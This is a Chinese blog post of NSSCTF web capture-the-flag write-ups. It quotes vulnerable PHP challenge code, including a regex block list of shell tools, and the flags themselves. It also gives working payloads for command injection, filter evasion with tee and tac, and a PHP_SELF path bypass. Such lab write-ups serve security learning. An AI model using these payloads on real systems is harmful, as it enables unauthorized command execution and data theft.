NSSCTF之Web篇刷题记录(12)

已于 2023-05-24 15:44:22 修改
阅读量1.8k 收藏 8
点赞数 5
分类专栏: CTF 文章标签: 前端 php 开发语言 CTF Web
于 2023-05-23 16:36:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130819310
版权

NSSCTF之Web篇刷题记录[12]

NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag都改为NSSCTF

[NCTF 2018]签到题:

打开是一个search.php 查看源代码都没有找到flag,最后在index.php的响应头找到了!

在这里插入图片描述

NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}

[鹤城杯 2021]EasyP:

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>

分析一下代码$_SERVE[‘PHP_SELF’] 调用的脚本的路径
$_SERVER[‘REQUEST_URI’]取得当前URI,也就是除域名外后面的完整的地址路径
basename函数: 返回路径中的文件名部分。

在这里插入图片描述
现在需要绕过preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']和正则 只要在php\后面加一个非ascll码就行比如汉字 由于preg_match正则匹配,我们不能直接输入show_source=‘’ 所以可以将show_source变为show[source
绕过preg_match正则方法是,在 index.php/utils.php后面添加一个非ascii表中的字符(很多都可以)

payload:/index.php/utils.php/巧克力?show[source=1

**加粗样式**

NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}

[NSSCTF 2022 Spring Recruit]ezgame:

玩游戏65分给你flag(懒得玩)提示给的是js所以我们找一下,在js/preload.js中找到FLAG

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}

[GXYCTF 2019]Ping Ping Ping:

这题之前讲过可以参考链接https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501

Payload:?ip=127.0.0.1;cat$IFS$9`ls`

在这里插入图片描述
在这里插入图片描述

NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}

[SWPUCTF 2021 新生赛]finalrce:

在这里插入图片描述

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

preg_match 函数用于执行一个正则表达式匹配,这里看到基本上过滤了很多命令cat,ls这种都不能使用了 可以使用tee命令

由于ls正则表达被过滤,所以我们还需要绕过preg_match 可以使用反斜杠(\)转义字符

这里的tee功能是从标准输入读取,再写入标准输出和文件 Payload:?url=l\s / |tee 1.txt 然后访问1.txt看到flllllaaaaaaggggggg

在这里插入图片描述
tac没有被过滤然后直接 构造Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (记得|后面要空格)在访问9.txt

在这里插入图片描述
在这里插入图片描述

NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}

[NISACTF 2022]checkin:

提示:尝试复制源码看看->010editor

识别到Unicode特殊字符复制到VScode中 复制下来URLencode编码一下

在这里插入图片描述

Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

在这里插入图片描述

NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}

[UUCTF 2022 新生赛]websign:

在这里插入图片描述

[GDOUCTF 2023]hate eat snake:

通过即可得到flag 或者先G几次 然后点取消,等六十秒左右,再按空格就会出flag

在这里插入图片描述
在这里插入图片描述

[HNCTF 2022 Week1]2048:

很经典的一个游戏了直接F12查看源代码 找到js 进去查看alert()输出复制到控制台运行即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{53160c888e25c3f828b23e316a7ae083}

[HDCTF 2023]Welcome To HDCTF 2023:

正常玩游戏 G了就会给FLAG,或者去js找,找到了一个JSFuck编码解码即可。

在这里插入图片描述
在这里插入图片描述

NSSCTF{We13ome_t@_HDCTF_2o23}

落寞的魚丶
关注
专栏目录
NSSCTF—wp
XikX_eleven的博客
09-21 1299
NSSctf wpPrize Problem2 Prize Problem2 根基提示url加/1.zip,下载压缩包 下载速度很慢 做了限制 idm 多线程下载 拉满32
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(WEB
jameshuangchuan的博客
08-08 3187
此处主要在NSSCTF平台()上开展刷题
nssctf web
qq_61988806的博客
04-25 1238
测试发现输入的内容会通过get传递但是没有其他内容观察一下响应头我们看到了这里的md5(string,raw)这里的string应该清楚就是字符串,是必选参数raw是可选参数 默认不写为FALSE。32位16进制的字符串。TRUE 代表16位2进制字符串。通过post传递这里是sql查询语句 目的是passdword=传递的值 在sql语句中 or 左右一边为true则语句都为true 这也是我们or 1 = 1 的由来,所有我们在这里要尝试构造带or的参数。
NSSCTF刷题1
weixin_74427106的博客
09-22 898
这是一道js信息泄露的题目直接查看源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码注意要将数字之间的空格去掉。
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 604
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
NSSCTF-web-2小白进阶(详解)
m0_63641882的博客
11-06 275
由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信息。,将当前页面cookie改为伪造的值,刷新页面即可看到flag。
SpringCore RCE 1day漏洞复现(NSSCTF Spring Core RCE)
Jinmindong
01-14 609
作为目前全球最受欢迎的Java轻量级开源框架,Spring允许开发人员专注于业务逻辑,简化Java企业级应用的开发周期。但在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并 写入任意路径下的文件。
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE
jameshuangchuan的博客
08-10 2777
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(CRYPTO
jameshuangchuan的博客
08-28 1164
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
NSSCTF 2nd WEB
ytl_storm的博客
09-25 391
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
NSSCTF刷题wp——Crypto入门
YougerXen的博客
04-10 2148
NSSCCTF Crypto 探索 Crypto入门 [鹤城杯 2021]easy_crypto ID:453 公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐 社会主义核心价值观密码,直接解,在线工具 解出后得fl
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1236
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
NSSCTF刷题记录
kindyyy的博客
03-13 923
NSSctf刷题记录,有错误欢迎指正
NSSCTF之Misc刷题记录
Aluxian_的博客
05-11 2259
[GKCTF 2021]签到 [NISACTF 2022]bmpnumber [领航杯江苏省赛 2021]签到题 [鹤城杯 2021]Misc2 [鹤城杯 2021]A_MISC [GXYCTF 2019]CheckIn [HDCTF 2023]hardMisc [NSSRound#1 Basic]cut_into_thirds [闽盾杯 2021]Modbus的秘密 [NISACTF 2022]神秘数字 [INSHack 2019]INSAnity [UTCTF 2020]Basics(MISC)
NSSCTF做题
wwwwyyyrre的博客
09-24 696
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
[SWPU CTF]之Misc(NSSCTF刷题记录
Aluxian_的博客
05-01 2422
第十二张图: 新闻联播 一般我晚上 7点或者19.00。第一张图:20%和80% 猜测可能是 28或82。第三张图:而立之年 30而立嘛 肯是30。第二张图:一张八卦图 猜测是08。第六张图:飞机歼-20 20。第七张图:两只黄鹂鸣翠柳 02。第八张图:一起去看流星雨 17。第四张图:北斗七星图 07。第五张图:江南四大才子 04。第十一张图:12星座 12。第十张图:一马当先 01。第九张图:乔丹 23。
NCTF-Writeup
Yukikaze_cxy
05-30 1756
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
[NCTF 2018]签到题 WriteUp
最新发布
F0ggym00n的博客
10-31 215
打开网页为secret.php(百度页面),改为访问默认页面index.php。在secret.php标头中看到flag位置,再看index.php标头。现在可以找到flag了,按格式提交即可。F12打开调试模式,在网络中查看标头。
nssctf pwn
10-24
NSSCTF (National Security Service CTF) 是一种网络安全比赛,其中pwn (Payload Writing and Exploitation) 题目通常涉及漏洞利用和内存安全相关的挑战。在这样的竞赛中,参赛者需要找到程序中存在的安全漏洞,如缓冲区溢出、格式化字符串漏洞等,并编写exploit(exploitation的简称),即一段恶意代码,来控制程序流程,获取flag(通常是一种竞赛得分的关键标识符)。 Pwn题目通常包括以下几个步骤: 1. **分析**:研究提供的二进制文件或源码,确定可能存在哪些类型的漏洞。 2. **栈溢出**:如果存在堆栈溢出,尝试构造payload,使其覆盖返回地址并指向自身或有用的地址。 3. **RCE(Remote Code Execution)**:通过修改程序的行为执行任意代码,可能需要理解如何设置环境变量或系统调用来达到目的。 4. **权限提升**:一旦获得某种程度的控制权,可能会尝试寻找路径提升权限到root或其他有更高权限的用户。 5. **获取flag**:执行特定操作或触发特定条件后,通常会在某个内存位置发现flag。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值